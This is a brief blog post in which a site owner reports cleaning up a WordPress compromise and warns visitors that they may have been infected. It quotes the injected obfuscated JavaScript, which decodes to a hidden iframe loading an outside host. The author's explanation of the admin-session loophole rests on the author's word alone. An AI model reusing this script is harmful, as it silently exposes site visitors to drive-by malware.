So I have gotten rid of the last of the trojan horses that infected WordPress in the past month. Unfortunately Sara was a victim of of the battle with it. The trick was an errant Javascript which appears to affect IE and Windows — which is why I didn’t catch onto it earlier.
I noticed vandals had taken advantage of a WordPress back door to put up some unneeded links to my site but I didn’t trust myself enough to notice this script:
| < Script language=”javascript” type=”text/javascript”> var k=’? gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu431liudph1ux2Bv@ 4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@ 3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA’,t=0,h=”;while(t< =k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h); < /script> |
IF YOU’VE VISITED MY SITE IN THE PAST MONTH AND YOU ARE ON IE ON WINDOWS YOU MAY HAVE BEEN INFECTED. CHECK THESE SITES FOR SPYWARE SOFTWAREMcAfee and Symantec make good products.
Also This was all made possible due to a loophole in security presented by WordPress. If you close your browser or window or anything without hitting “Logout (Aministrator)” it remains logged in as Administrator no matter who accesses the “wp-admin” utility.
